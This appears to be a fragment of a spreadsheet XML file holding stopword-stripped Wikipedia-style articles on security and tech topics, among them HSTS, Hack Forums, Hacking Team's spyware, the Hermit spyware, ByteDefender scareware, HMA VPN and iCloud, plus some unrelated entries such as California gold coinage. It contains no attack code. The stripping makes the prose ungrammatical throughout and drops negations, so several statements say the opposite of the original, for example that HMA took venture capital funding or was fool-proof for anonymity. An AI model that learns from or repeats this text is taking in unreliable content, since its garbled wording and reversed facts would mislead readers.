ietf websec working group security 262: strict transport security open application security project (owasp): hsts description online browser hsts public pinning test online hsts test servers hsts preload submission google chrome, mozilla firefox, safari, edge chromium hsts preloaded list strict-transport-security docs every update about hsts policy</t>
  </si>
  <si>
    <t>HTTP Switchboard</t>
  </si>
  <si>
    <t>http switchboard chromium browser extension (which also works chromium-based browsers opera (from version yandex browser) allows filtering hypertext transfer protocol (http) requests based content and/or target's domain name. comes optional, pre-defined blacklist hostnames might privacy threat sending requests and/or security threat/annoyance content delivered response. http switchboard's developer, raymond hill, also developed browser extensions, including filtering ublock actively leads ublock origin.http switchboard longer actively developed. instead replaced ublock origin well umatrix, latter as-of-now unmaintained extension aimed advanced users. references external links project homepage</t>
  </si>
  <si>
    <t>HTTP header injection</t>
  </si>
  <si>
    <t>http header injection general class application security vulnerability occurs hypertext transfer protocol (http) headers dynamically generated based user input. header injection http responses allow http response splitting, session fixation set-cookie header, cross-site scripting (xss), malicious redirect attacks location header. http header injection relatively area web-based attacks, primarily pioneered amit klein work request/response smuggling/splitting. sources file download injection offline owasp http request splitting owasp testing http splitting/smuggling http smuggling 2015 also http request smuggling references</t>
  </si>
  <si>
    <t>Cameron Lacroix</t>
  </si>
  <si>
    <t>cameron lacroix, camo, cam0, camzero, cmunny, american computer hacker best known hacking paris hilton's cellular phone, accessing lexisnexis, defacing burger king's twitter account. also convicted intentionally causing damage protected computer system, obtaining information protected computer system, wire fraud, aggravated identity fraud. prosecutors said victims teen's actions suffered million damages. pursuant plea agreement signed juvenile august 2005, received months federal juvenile detention facility. references</t>
  </si>
  <si>
    <t>CamScanner</t>
  </si>
  <si>
    <t>camscanner chinese mobile first released 2011 allows android devices used image scanners. allows users 'scan' documents taking photo device's camera) share photo either jpeg pdf. this available free charge google play store apple store. based freemium model, ad-supported free version premium version additional functions. history august 2019, russian cyber security company kaspersky discovered recent versions android distributed advertising library containing trojan dropper, also included apps preinstalled several chinese mobiles. advertising library decrypts archive subsequently downloads additional files servers controlled hackers, allowing hackers control device, including showing intrusive advertising charging paid subscriptions. google took kaspersky reported findings. updated version advertising library removed made available google play store september 2019. kaspersky later acknowledged appreciate willingness cooperate we've seen camscanner representatives, well responsible attitude user safety demonstrated eliminating threat…the malicious modules removed immediately upon kaspersky's warning, google play restored app."in june 2020, tensions along line actual control china india continued, government india decided chinese apps, including tiktok camscanner citing data privacy issues. january 5th, 2021, president donald trump signed executive order banning alipay, tencent's wallet, wechat pay, camscanner, shareit, vmate office conduct transactions. trump administration explained saying move helps prevent personal information text, phone calls photos collected rivals. however, biden administration meet february 2021 deadline implementing executive order, allowing apps operate features scan documents allows user scan documents taking picture phone camera. optical character recognition feature recognizes texts images extract images later searching, editing sharing. document editing users make annotations, watermarks, signature scan documents imported local folder. also allows user passwords protect files sharing email, fax, social media. conversion camscanner support variety format conversion including converting word, excel, ppt, vice versa. references</t>
  </si>
  <si>
    <t>Cam (bootleg)</t>
  </si>
  <si>
    <t>(camrip camming, deriving camcorder) bootleg recording film. generally unlike common screener recording methods involve duplication officially distributed media, versions original clandestine recordings made movie theaters. audience camming common type produced theater patron smuggles compact digital camcorder theater hiding clothing container handbag backpack. filmer records movie using camcorder unobtrusively possible. they pick seat back theater possible avoid attention patrons (and ensure proper framing screen) and/or choose sparsely attended showtimes. filmer also rely cinema employees overlook infringement activity existing friend family relationship, collusion, bribery, apathy law. attempt impede practice well curb smuggling non-theater food), establishments customers carrying bags containers theaters. additional form deterrent, theaters equip ushers night vision goggles discreetly catch bootlegger recording.cams produced camera's microphone record audio, tends produce recording sounds "muddy". addition, microphone pick ambient noises theater, audience's response film (e.g. laughter, screaming) disruptive noises (crying baby, mobile phone ring, people coughing, etc.). older poorly maintained theaters, sounds conditioning sound adjacent theater screens also audible. cases tripod used handicapped sections cinema plugging jack hard-of-hearing device. these recordings better sound called telesync. camera situated audience area record silhouettes audience members, especially leaving theater restroom concession stand. parts world video standard pal, european countries australia, standard frame rate 25p, result video problems frame rate conversion 24fps film projection camera. projectionist camming sometimes versions made projectionists themselves, either home distribute (with without profit). this provides several advantages: first, projection booth window central, unobstructed view screen. second, projectionist bypass built-in microphone link camcorder directly monitor output audio rack, resulting clear, well-separated stereo recording. projectionist also alleviate frame rate conversion problem described speeding projector film's traditional standard video camera record film picture. these advantages come higher risk: projectionist, caught, almost certainly fired, likely typical audience member face legal prosecution. anti-piracy since 2001, many major motion pictures shipped theaters watermarks unique patterns tiny dots embedded throughout film, known coded anti-piracy technology. cammer unable catch blur sequences, studio determine theater recorded. compared piracy methods overall quality bootlegs highly dependent upon choice theater (and sometimes individual screening), quality camera used, skill operator framing screen minimizing camera movement, method encoding used distribution. cams generally considered lowest fidelity method duplicating video film content, somewhat behind telesync markedly worse rips screeners. newly released films, however, cams often first bootleg copies available. developing world, dvds often available street vendors prices equivalent us$1–2 (ppp); worldwide, swapped sold internet pirate sites. origin around start millennium, many first time camera recordings originated malaysia, recognizable burn-in malay subtitles. vcds often appeared days theatrical release. cases, even available online months release. robert krulwich sees possibilities main reason early availability illicit recordings. someone hollywood shows movies couple days show america, people prints sent people californian movie business. also analog hole coded anti-piracy, anti-copyright infringement technology marking movie pattern dots identify source illegal copies list warez groups scene, underground internet community used active creation spreading bootleg movie recordings "the little kicks", 1996 episode television series seinfeld bootlegging major storyline warez references external links prince darknet feature story legal affairs regarding movie copyright infringement, may/june 2005. information cinema employees fight piracy title u.s. code section 2319b unauthorized recording motion pictures motion picture exhibition facility (united states law). 540.12 unlawful recording device motion picture theater (state florida law). warner bros. cancels canadian preview screenings citing piracy concerns</t>
  </si>
  <si>
    <t>California gold coinage</t>
  </si>
  <si>
    <t>california gold coinage broad category privately-issued coin-like items used place official currency united states territory (later state) california gold rush 1849. since federal government reserves right issue legal tender coins, california gold coinage misnomer actually references coin-like ingots stated tender value, tokens stated tender value (denominated), tokens without stated tender value (non-denominated). these items classified ingot value metal close tender value marked piece. spite misnomer, common practice among numismatists label coin-like ingots denominated tokens 'coins' labeling non-denominated tokens 'tokens'. also, small california gold coins tokens made many locations california, often claim california piece items generally labeled california gold coins tokens. coin-like ingots produced 1849 1856 denominations $10, $20, $25, $50. many made well-known assayers. some achieved circulation east coast united states. highly valued today.tokens stated tender value produced 1852 1883 well spuriously later years. these made denominations $0.50, $0.25 round octagonal shapes. early period, roughly 1852 1853, coins made actual scarcity silver coins. these coins quickly rejected small handle, simultaneously gained popularity souvenirs could economically mailed families. although earliest issues 80-90% correct weight denomination, weights constantly decreased years issue. only extremely rare "defiant eagle" issue full weight gold.tokens without stated tender value produced since 1869. coinage 1864 made private creation items intended passed legal tender illegal. this first enforced obscure case boston 1869 later enforced public fashion leavenworth 1871. time several manufacturers stopped production denominated pieces manufacturers stepped denominated non-denominated issues. after overzealous visit united states secret service 1883 charges ever pressed), remaining manufacturers switched non-denominated issues. since issues produced, often gold-rush dates them, less continuously present. also territorial gold references external links california gold coins</t>
  </si>
  <si>
    <t>Hack Forums</t>
  </si>
  <si>
    <t>hack forums (often shortened 'hf') internet forum dedicated discussions related hacker culture computer security. website ranks number website "hacking" category terms web-traffic analysis company alexa internet. website widely reported facilitating online criminal activity, case zachary shames, arrested selling keylogging software hack forums 2013 used steal personal information. security breaches june 2011, hacktivist group lulzsec, part campaign titled days lulz", breached hack forums released data obtained. leaked data included credentials personal information nearly 200,000 registered users.on august 2014, hack forums hacked defacement message egyptian hacker, using online handle "eg-r1z".on july 2016, hack forums administrator ("omniscient") warned users security breach. e-mail suggested users change passwords enable 2fa. alleged criminal incidents according press release u.s. department justice, zachary shames developed keylogger 2013 allowed users steal sensitive information, including passwords banking credentials, victim's computer. shames developed keylogger known "limitless logger pro", sold hack forums.on august 2013, hackers used brute-force mass target linux systems weak passwords. tools used hackers later posted hack forums.on 2014, targeted customers popular remote administration tool (rat) called 'blackshades'. blackshades malware created sold hack forums.on january 2016, developer megalodonhttp botnet arrested. megalodonhttp included number features "binary downloading executing", "distributed denial service (ddos) attack methods", "remote shell", "antivirus disabling", "crypto miner bitcoin, litecoin, omnicoin dogecoin". malware sold hack forums.on september 2016, many major websites forced offline “mirai”, malware targeted unsecured internet things (iot) devices. source code mirai published hack forums open-source. response, october 2016, omniscient, administrator hack forums, removed ddos-for-hire section forum permanently.on october 2016, popular websites, including twitter, amazon, netflix, taken distributed denial-of-service attack. researchers claimed attack stemmed contributors hack forums.on monday, february 2018, agence france-presse (afp) reported ukrainian authorities collared avalanche cybercrime organizer gennady kapkanov, allegedly living fake passport poltava, city central ukraine. marketed remote administration tool (nanocore rat) another software licensing program called seal exclusively hack forums. earlier, december 2016, arrested taylor huddleston, programmer created nanocore announced first hack forums.on august 2018, several users hack forums claimed received e-mail google informing demanded release user data linked luminositylink malware sold hack forums.on october 2018, vice media reported saud al-qahtani, advisor crown prince mohammed salman saudi arabia alleged masterminds behind assassination jamal khashoggi, heavily active hack forums many years username nokia2mon2, requesting assistance hacking victims purchasing malicious surveillance software. there rumours among users hack forums nokia2mon2 connected government saudi arabia using website resource perform espionage journalists, foreigners, dissidents. public reception according cyberscoop's patrick howell o'neill, "the forum caters mostly young audience curious occasionally malicious, still learning... furthermore, hackforums kind internet community seem impenetrable, even incomprehensible, outsiders. reputation populated trolls: chaos-driven children brazen criminal activity."cybersecurity journalist brian krebs described hackforums forum overrun teenage wannabe hackers spend time trying impress, attack steal another." allison nixon, director security research flashpoint, compared activity hackforums real-world street gangs, stating: bunch kids, adults, people predispositions, sometimes guidance steer productive direction. gangs forming. there online street gangs speak, pretty destructive violent street gangs neighborhood. individuals become part gang order sense community, sense safety, perhaps something they’re bored. seems like there’s parallels. also raidforums dark0de nulled blackhatworld references external links official website</t>
  </si>
  <si>
    <t>HackBB</t>
  </si>
  <si>
    <t>hackbb hidden service internet forum specializing buying stolen credit cards, skimming atms, hacking computers, servers accounts. site often destination hacked stolen data dumps. point site hosted hosting company freedom hosting.the site founded 'optimuscrime' earlier days tor. june 2012, user 'boneless' promoted administrator role, went handle site escrow. however, march 2013 boneless's account used destroy site's database, accounts secretly created. site initially recovered this, shut sometime afterwards loss faith site's administration raid host freedom hosting august 2013. references</t>
  </si>
  <si>
    <t>Hacker Croll</t>
  </si>
  <si>
    <t>françois cousteix, better known hacker croll, french self-taught cracker notable hacking twitter july 2009. close contact reporters techcrunch published numerous articles information obtained incident itself. remained anonymous arrest march 2010. attack twitter croll obtained access many twitter's high-profile executives' numerous internet accounts. infiltration made easy targets passwords usernames personal business accounts. this domino effect whereby accounts hacked including paypal itunes accounts. obtained pages sensitive documents including twitters financial projections meeting notes. techcrunch reports techcrunch first reported hack included screenshot twitter founder evan williams' facebook page speculation true extent attack july includes statement williams saying "this nothing security twitter.com". croll, apparently concerned twitter understood danger attack sent documents obtained techcrunch, subsequently published select section them. extensive article describing details attack days later techcrunch interviewed croll. letter twitter when asked techcrunch message would like send twitter responded note encouraged careful security. tiens présenter toutes excuses personnel twitter. trouve cette société beaucoup d’avenir devant elle. j’ai fait cela dans lucratif. sécurité domaine passionne depuis longues années voudrais faire métier. dans quotidien, m’arrive d’aider gens prémunir contre dangers l’internet. leur apprend règles base.. exemple, faire attention clique, fichiers l’on télécharge l’on tape clavier. s’assurer l’ordinateur équipé d’une protection efficace contre virus, attaques extérieures, spam, phishing… mettre jour système d’exploitation, logiciels fréquemment utilisés… penser utiliser mots passe sans aucune similitude entre eux. penser changer régulièrement… jamais stocker d’informations confidentielles l’ordinateur… j’espère interventions répétées auront permis montrer quel point peut être facile personne intentionnée d’accéder informations sensibles sans trop connaissances. hacker croll. english: apologize twitter. believe company going places. make money that. security topic interested many years want turn hobby career. everyday life, often help people protect dangers internet. teach basic rules careful click, files download, type keyboard. ensure computer protected viruses, external attacks, spams, phishing update operating system, software frequently used think using passwords without common point them. thinking changing regularly never keep off-the-record information computer hope numerous interventions allow [the firm] understand easy malicious person access confidential information without much knowledge. hacker croll. arrest arrested march 2010 joint investigation federal bureau investigation french police. handed five-month suspended sentence criminal court clermont-ferrand, instead months €1,000 fine recommended prosecutors; croll announced would appeal sentence. references</t>
  </si>
  <si>
    <t>Hacking Team</t>
  </si>
  <si>
    <t>hackingteam milan-based information technology company sold offensive intrusion surveillance capabilities governments, enforcement agencies corporations. "remote control systems" enable governments corporations monitor communications internet users, decipher encrypted files emails, record skype voice communications, remotely activate microphones camera target computers. company criticized providing capabilities governments poor human rights records, though hackingteam states ability disable software used unethically. italian government restricted licence business countries outside europe.hackingteam employs around people italian office, subsidiary branches annapolis, washington, d.c., singapore. products dozens countries across continents. company foundation hackingteam founded 2003 italian entrepreneurs vincenzetti valeriano bedeschi. 2007 company invested italian fondo next innogest.the milan police department learned company. hoping tool italian citizens listen skype calls, police contacted vincenzetti asked help. hackingteam became "the first sellers commercial hacking software police”. according former employee byamukama robinhood, company began security services provider, offering penetration testing, auditing defensive capabilities clients. byamukama states malware offensive capabilities developed accounted larger percentage revenues, organization pivoted offensive direction became increasingly compartmentalized. byamukama claims fellow employees working aspects platform example, android exploits payloads would communicate another, possibly leading tensions strife within organization.in february 2014, report citizen identified organisation using hosting services linode, telecom italia, rackspace, noc4hosts bullet proof hosting company santrex.on july 2015 company suffered major data breach customer data, software code, internal documents e-mails. (see: 2015 data breach) april 2019 hackingteam acquired inthecyber group create memento labs products capabilities hacking team enables clients perform remote monitoring functions citizens (remote control systems), including vinci galileo platforms: covert collection emails, text message, phone call history address books keystroke logging uncover search history data take screenshots record audio phone callscapture audio video stream device memory bypass cryptography skype sessions microphones device collect ambient background noise conversationsactivate phone computer cameras hijack telephone systems monitor target's location infect target computer's uefi bios firmware rootkit extract wifi passwords exfiltrate bitcoin cryptocurrency wallet files collect data local accounts, contacts transaction historieshackingteam uses advanced techniques avoid draining cell phone batteries, could potentially raise suspicions, methods avoid detection.the malware payloads android, blackberry, apple ios, linux, symbian, well microsoft windows, windows mobile windows phone class operating systems.rcs management platform allows operators remotely deploy exploits payloads targeted systems, remotely manage devices compromised, exfiltrate data remote analysis. controversies repressive governments hackingteam criticized selling products services governments poor human rights records, including sudan, bahrain, venezuela, saudi arabia.in june 2014, united nations panel monitoring implementation sanctions sudan requested information hackingteam alleged sales software country contravention united nations weapons export bans sudan. documents leaked 2015 data breach hackingteam revealed organization sold sudanese national intelligence security service access "remote control system" software 2012 960,000 euros.in response united nations panel, company responded january 2015 currently selling sudan. follow-up exchange, hackingteam asserted product controlled weapon, request beyond scope panel. there need disclose previous sales, considered confidential business information.the u.n. disagreed. "the view panel software ideally suited support military electronic intelligence (elint) operations potentially fall category 'military equipment' 'assistance' related prohibited items," secretary wrote march. "thus potential targeting belligerents darfur conflict interest panel."in fall 2014, italian government abruptly froze hackingteam's exports, citing human rights concerns. after lobbying italian officials, company temporarily back right sell products abroad. 2015 data breach july 2015, twitter account company compromised unknown individual published announcement data breach hackingteam's computer systems. initial message read, "since nothing hide, we're publishing e-mails, files, source code ..." provided links gigabytes data, including alleged internal e-mails, invoices, source code; leaked bittorrent mega. announcement data breach, including link bittorrent seed, retweeted wikileaks many others social media.the material voluminous early analysis appeared reveal hackingteam invoiced lebanese army sudan tools also sold bahrain kazakhstan. hackingteam previously claimed never done business sudan.the leaked data revealed zero-day cross-platform flash exploit (cve number: cve-2015-5119. dump included demo exploit opening calculator test webpage. adobe patched hole july 2015. another vulnerability involving adobe revealed dumps, took advantage buffer overflow attack adobe open type manager included microsoft windows. kernel mode, attack could perform privilege escalation bypass sandbox.also revealed leaked data hackingteam employees' weak passwords, including 'p4ssword', 'wolverine', 'universo'.after hours without response hackingteam, member christian pozzi tweeted company working closely police "what attackers claiming regarding company true." also claimed leaked archive "contains virus" constituted "false info". shortly tweets, pozzi's twitter account apparently compromised.responsibility attack claimed hacker known "phineas fisher" phisher) twitter. phineas previously attacked spyware firm gamma international, produce malware, finfisher, governments corporations. 2016, phineas published details attack, spanish english, "how-to" others, explained motivations behind attack.the internal documents revealed details hackingteam's contracts repressive governments. 2016, italian government revoked company's license sell spyware outside europe without special permission. mexican drug cartels corrupt mexican officials helped drug cartels obtain state-of-the-art spyware (including hacking team spyware). software used target intimidate mexican journalists drug cartels cartel-entwined government actors. customer list hackingteam's clientele include governments, also corporate clients barclays british telecom (bt) united kingdom, well deutsche bank germany.a full list hackingteam's customers leaked 2015 breach. disclosed documents show hackingteam current customers, mostly military, police, federal provincial governments. total company revenues disclosed exceeded million euros.on 2021,sentinellabs released research report turkish threat actor egomaniac,that used remote control system (rcs), software italian infosec firm hacking team,which operated 2010 2016 campaign turkish journalists odatv spying turkish police. also finfisher minipanzer megapanzer vupen 0-day exploit provider linked hackingteam mamfakinch citizen media organization targeted malware allegedly developed hackingteam references external links official website hackingteam archives investigative reports published citizen wikileaks: hackingteam archives searchable database million internal emails hackingteam presentations wikileaks "spy files" {software update}</t>
  </si>
  <si>
    <t>Calgary Dollar</t>
  </si>
  <si>
    <t>calgary dollars local currency calgary, alberta, canada. while functioning limited form currency within calgary, legal tender backed national government. instead, currency intended tool community economic development well focus community building local resiliency. overview 2018 calgary dollars launched digital component online listings platform, android website. watch calgary dollars video comes denominations calgary dollars. bills printed plastic material dimensions canadian dollar. print, currency commonly abbreviated "c$".the currency founded 1995 project arusha centre calgary. project originally called "bow chinook barter community (bcbc)", currency named "bow chinook hour". 2002, "bow chinook hour" currency replaced "calgary dollars" (which also adopted name project). calgary dollars organization considers local currency implicitly sanctioned canada revenue agency (cra) based publication discusses taxation "credit units possessing notional monetary unit value" used medium exchange local barter groups.calgary dollars rebranded logo march 2018 slogan: "get local. make money." also berkshares complementary currency ithaca hours toronto dollar bristol pound references external links calgary dollars arusha centre calgary dollars marketplace</t>
  </si>
  <si>
    <t>HMA (VPN)</t>
  </si>
  <si>
    <t>(formerly hidemyass!) service founded 2005 united kingdom. subsidiary czech cybersecurity company avast since 2016. history created 2005 norfolk, england jack cator. time, cator sixteen years-old. created order circumvent restrictions school accessing games music network. according cator, first service created hours using open-source code. first product free proxy website users typed delivered website user's browser.cator promoted tool online forums featured front page digg. after attracting thousand users, cator incorporated ads. take venture capital funding. generated $1,000 $2,000 month founder went college pursue degree computer science. 2009, cator dropped college focus added paid service. most early employees freelancers found odesk. 2012, freelancers competing business. responded hiring contractors full-time employees establishing physical offices london.in 2012, united kingdom's government sent court order demanding provide information cody andrew kretsinger's hma's service hack sony member lulzsec hacking group. provided information authorities. said violation company's terms software illegal activities.in 2013, added software anonymize internet traffic mobile devices first added 2013. 2014, company introduced hidemyphone! service, allowed mobile phone users make calls appear come different location.by 2014, service million users 215,000 paying subscribers service. made million revenue year. staff established international offices belgrade kyiv.by 2015, became largest providers. 2015, acquired technologies million million earn-out upon achievement milestones, became part avast 2016 acquisition technologies.in 2017, security vulnerability discovered allowed hackers access user's laptop obtain elevated privileges device. corrected vulnerability days later.in 2019, reported received directive russian authorities join state sponsored registry banned websites, would prevent russian users circumventing russian state censorship. reportedly given month comply, face blocking russian authorities. software provides digital software services intended help users remain anonymous online encrypt online traffic. software used access websites blocked user's country, anonymize information could otherwise used hackers, something unscrupulous without identified. hma's privacy policy terms prohibit using illegal activity.hma hides user's address identifying information routing user's internet traffic remote server. however, experts note company connection data including originating address, duration session, amount bandwidth used.as 2018, company servers locations across globe provided 3000 addresses. software also includes kill switch across platforms. privacy according invisibler, appears cooperated authorities handing logs hacking case. this arrest hacker known "lulzsec fiasco". reception 2015, review tom's hardware said easy use, good customer service, large number server locations choose from, criticized slowing internet speeds. contrast, digital trends said strong speeds good server selection, fool-proof ensuring anonymity, stored user activity logs 2020, announced would longer user activity). 2017, world noted difficult measure effect service internet speed, variables like location, internet service speeds, hardware.a 2016 review pcmag gave android stars. praised server selection user interface, criticized price, speed, lack advanced features. 2018, pcmag gave similar feedback service. world’s 2017 review also praised hma's simple user interface, criticized lack advanced features, saying software ideal casual users need advanced configuration options. references external links official website</t>
  </si>
  <si>
    <t>Here you have</t>
  </si>
  <si>
    <t>here computer worm successfully attacked tens thousands windows computers 2010 sent link inside email message text "here have" subject line. worm arrived email inboxes september 2010 simple subject "here have". final extension link hidden default, leading unsuspecting users think mere file. upon opening attachment, worm sent copy everyone windows address book. architecture worm worm requires user clicks link, accepts several times (depending system configuration) order deliver payload. worm propagates sending copies entries microsoft outlook address book. also code worm nimda worm iloveyou worm anna kournikova (computer virus) timeline notable computer viruses worms pikachu virus references external links sans diary article computerworld article msnbc article</t>
  </si>
  <si>
    <t>Hermit (spyware)</t>
  </si>
  <si>
    <t>hermit spyware developed italian commercial spyware vendor covertly installed mobile phones running android. software publicized google's threat analysis group (tag) june 2022, previously disclosed security research group lookout. details according lookout, business group, gained notoriety pegasus spyware, sells spyware government agencies. lookout believes hermit deployed governments kazakhstan italy. similar pegasus, hermit capable tracking calls, location tracking, reading text messages, accessing photos, recording audio, making intercepting phone calls, could gain root android devices. some attackers would pose victim's mobile carrier, sometimes carrier's assistance, trick victim downloading would deliver payload. another vector used posing legitimate messaging app. while apps containing spyware made available store google play store, malicious actors able obtain certificates allowing installation device apple's developer enterprise program. once hermit publicized, apple said revoked certificates related google said pushed google play protect updates users. also list spyware programs imsi-catcher references external links google's threat analysis group blog lookout's website apple developer enterprise program</t>
  </si>
  <si>
    <t>ByteDefender</t>
  </si>
  <si>
    <t>bytedefender also known bytedefender security 2010 scareware rogue malware application windows masquerades legitimate antivirus program. uses false system scanner produces large deposits malware attempts scare users purchase full version rogue software removal nonexistent and/or unnecessary spyware items. name antispyware program used confuse user looking legitimate bitdefender downloading software.bytedefender security 2010 downloaded trojan horse along possible antivirus programs. additionally, bytedefender comes winpc defender family rogue antispyware programs. features bytedefender website official website bytedefender security 2010 (www.bytedefender.in) unauthorised clone bitdefender antivirus 2010 website different layouts. heading page looks different original website. software's slogan uses maximum security help protect instead maximum security, maximum speed. price bytedefender security 2010 expensive legitimate bitdefender. symptoms infection bytedefender designed behave like genuine antispyware softwares system scans messages false. immediately create trojan horse affect system's behavior form fake online scanner fake video codec. entry hkcu hklm every time start windows. malicious entries registry system. generate multiple commercial advertisements stating system infected spyware malware. removal threat force victims full rogue version. removal bytedefender detected removed certain antispyware antivirus programs like spyhunter, bitdefender malwarebytes. also rogue security software references</t>
  </si>
  <si>
    <t>Byte Bandit</t>
  </si>
  <si>
    <t>byte bandit boot sector computer virus created commodore amiga. first appeared january 1988. contrast feared amiga viruses like infamous lamer exterminator saddam, byte bandit destructive. spread automatically system system. byte bandit made attempt disguise modern viruses, trojans, worms while naturally over-wrote bootblock, also hooked system, remaining reset-resident causing system data corruption system failures. virus increments copy counter every time writes disk, text string "virus byte bandit 9.87. number copys:" also gives date september 1987 creation, well assumed name programmer. external links http://www.sca.ch/ swiss cracking association's homepage byte bandit-virus description amiga virus encyclopedia</t>
  </si>
  <si>
    <t>I-drive</t>
  </si>
  <si>
    <t>i-drive file hosting service operated 1998 2002.the name derived words "internet drive". history based francisco, company founded 1998 seed investors launched first product, online file storage service august 1999. idea originated early company jeff bonforte co-founded 1996 called shellserver.net, provided space users. bonforte compiled founding team, included chris lindland, patrick fenton, craycroft, rich macalmon, john reddig perrelli (the last three also company's first angel investors). originally presented i-drive.com, company acquired domain idrive.com around october 1999. initial product offered limited amount free file storage space, later enhanced offering 'sideloading' storing files files collected world wide without need user download individual computer. january 2000, company began offering unlimited storage space application called filo.in 2001 company transitioned offering free storage service transformed underlying software architecture middleware storage mechanism product, seeking sell various markets including marketplace, targeting companies docomo earthlink. january 2002 company name changed anuvio technologies. i-drive's assets acquired corporation 2002. certain assets (including idrive.com domain name) acquired softnet corp also offered online storage services. height, i-drive hosted million registered users, employed people, held partnerships mp3.com, zdnet.com, major universities. service rated "top application" cnet 2000 technologies watch" fortune magazine 2000. company raised us$30 million venture capitalists draper fisher jurvetson, information technology ventures, global retail partners, hikari (japan), philips (netherlands), emc, partners group (switzerland). references mp3.com i-drive.com join forces store manage files</t>
  </si>
  <si>
    <t>I.CX</t>
  </si>
  <si>
    <t>i.cx messaging file sharing application providing end-to-end encryption without download installation. developed toronto firm everybit, relies open-source everybit.js framework. encryption done client-side users browser. files messages stored sent using i.cx protected 256-bit encryption. references</t>
  </si>
  <si>
    <t>Bvckup 2</t>
  </si>
  <si>
    <t>bvckup backup software windows family, developed swiss-based bureau replicates files location another original format uses delta copying speed operation. program supports scheduling, removable device tracking, using shadow copy service transfer open locked files, move renaming detection, security attribute cloning, email alerts. references external links official website</t>
  </si>
  <si>
    <t>IBM Unica NetInsight</t>
  </si>
  <si>
    <t>unica netinsight analytics application utilized extract, transform, load methodology populate database could queried using browser-based interface. netinsight family tools unica nettracker. april 2014, announced unica netinsight would discontinued. history affinium netinsight first released june 2006 version 7.0. with release version affinium netinsight renamed unica netinsight, dropping (along rest unica products) affinium brand. acquires unica corporation unica netinsight software adopts name, unica netinsight. technology netinsight extract, transform, load process read files virtually format, including logs servers, proxy servers, streaming media servers servers. well processing normal server files netinsight files derived page tags replace augment file data.netinsight stores processed files database oracle database, microsoft server, netezza appliance. also analytics analysis software unica nettracker references external links unica analytics understanding funnel reports nettracker unica netinsight user group</t>
  </si>
  <si>
    <t>ICloud</t>
  </si>
  <si>
    <t>icloud cloud-storage cloud-computing service apple inc. launched october 2011. 2018, service estimated million users, million users 2016.icloud enables users store data documents, photos, music remote servers download ios, ipados, macos windows devices, share send data users, manage apple devices lost stolen. icloud also provides means wirelessly back devices directly icloud, instead reliant manual backups host windows computer using finder (apple's file manager)or itunes (deprecated). service users also able share photos, music, games instantly linking accounts airdrop wireless. icloud replaced apple's mobileme service, acting data syncing center email, contacts, calendars, bookmarks, notes, reminders (to-do lists), iwork documents, photos, data. apple eleven company-owned -operated data centers supporting icloud services. company data centers united states, denmark, three china. apple's original icloud data centers located maiden, north carolina, us.beginning 2011, icloud based amazon services microsoft azure (apple security white paper published 2014, apple acknowledged encrypted files stored amazon microsoft azure). 2016, apple signed deal google google cloud platform icloud services.in october 2016, bloomberg reported apple working project aims improve speed experience apple's online services operated directly apple.in june 2021, apple introduced icloud+, introduced private relay, hide email custom email domains paid users services, well unlimited storage limit video cameras added homekit secure video. system requirements icloud account creation requires either device running later running lion v10.7.5 later, well internet connection compatible browser. also, certain features minimum requirements versions. example, using icloud photo sharing requires mavericks v10.9 mac.devices running older versions macos (before mavericks) (below unable sign icloud icloud password changed: resolution issue upgrade impossible device meet newer minimum requirements.synchronizing requires windows later using icloud control panel, optionally outlook 2007 later built-in windows mail calendar apps sync calendar, contacts, reminders. users must apple device icloud windows. synchronization bookmarks requires safari 5.1.1 later macos, internet explorer firefox google chrome later windows.mobileme account users could move accounts icloud account, keeping account details. history icloud announced june 2011, 2011 apple worldwide developers conference (wwdc). apple announced mobileme would discontinued june 2012, anyone account unveiling icloud mobileme service extended date, free charge.the official website, www.icloud.com, went live early august apple developers. october 2011, icloud became available itunes update. icloud million users less week launch. icloud.com domain registered trademark bought swedish company called xcerion, rebranded service cloudme. apple controls major domains like icloud.de, icloud.fr icloud.es.a class action lawsuit customers unhappy transition mobileme icloud filed early-may 2012.in june 2019, icloud introduced windows microsoft store.on june 2021, apple introduced upgraded version icloud users paid additional storage called icloud+ 2021 apple worldwide developers conference. icloud+ includes private relay, allowed users browse safari without tracked, hide email, allows users sign websites apps private email address forwarded messages main inbox, updates homekit secure video allows icloud+ users unlimited number homekit cameras count storage limit. announcement first official mention icloud apple came 2011, press release announced would demonstrate service wwdc june 2011. banner hung moscone center wwdc revealed icloud logo five days official launch.at wwdc 2011 keynote speech, steve jobs last public appearances) announced icloud replace mobileme services basic icloud service free charge. features cloud-based system allows users store heterogeneous music, photos, applications, documents, bookmarks, reminders, backups, notes, apple books, contacts provides platform apple's email servers calendars. third-party macos developers implement icloud functionality apps icloud api. backup restore icloud allows users back settings data devices running later. data backed includes photos videos camera roll, device settings, data, messages (imessage, sms, mms), ringtones, visual voicemails. backups occur daily device locked connected wi-fi power source. case malfunction apple device, restoration process, icloud offers restore data along data device synced icloud backed back back mac, also previously part mobileme, part icloud. before, service allows users remotely computers back enabled configured apple august 2018, apple updated support document note back would part upcoming macos mojave (10.14) release. email icloud account include email account, much like mobileme, .mac, itools previously. however, unlike mobileme previous iterations, email account optional part icloud account, user choose non-icloud email address icloud apple email account accessed using standard imap-compatible email client, well browser icloud.com. additionally, device, icloud email push-enabled. users converted existing mobileme accounts icloud accounts kept existing "@me.com" email addresses; users whose accounts pre-dated mobileme me.com mac.com email addresses kept both. well retaining previous addresses, users also received matching "@icloud.com" address. mailbox account, messages sent user's icloud email addresses inbox. find friends find iphone friends added icloud alongside launch allowing users share current location friends family. added location-based alerts notify user device arrives certain location.on find friends built cannot removed. from onwards included, deleted subsequently reinstalled store. october 2015, find friends added icloud.com view "friends" locations. find iphone find iphone, formerly part mobileme, allows users track location device mac. user device's approximate location (along circle showing radius depicting margin error), display message and/or play sound device (even silent), change password device, remotely erase contents. feature first announced june 2009, included software update feature paying mobileme users. find iphone made free charge 4.2.1 software update november 2010, devices introduced 2010. also released apple june 2010, allows users locate device devices running later software. find iphone continued feature icloud. introduced lost mode, feature allows user mark device "lost", making easier protect find. feature also allows someone finds user's lost iphone call user directly without unlocking similar phone finder services various names available families smartphones. activation lock introduced 2013 integrated icloud find iphone feature. this feature locks activation iphone, ipad, ipod touch apple watch restored either recovery mode without first disabling find iphone feature. once restore completed, device apple password previously associated proceed activation, ultimately preventing stolen device usable.as find iphone built-in app, thus cannot removed.in ipados find iphone find friends merged find find find replaced find iphone find friends, merging apps ipados icloud keychain icloud keychain password manager developed apple syncs passwords across devices suggests secure ones creating accounts.icloud keychain backups provide different security guarantees traditional icloud backups. this icloud keychain uses "end-to-end encryption", meaning icloud keychain backups designed provider access unencrypted data. this accomplished novel "key vault" design based hardware security module located apple's data centers. itunes match itunes match debuted november 2011. initially available users only. annual fee, customers 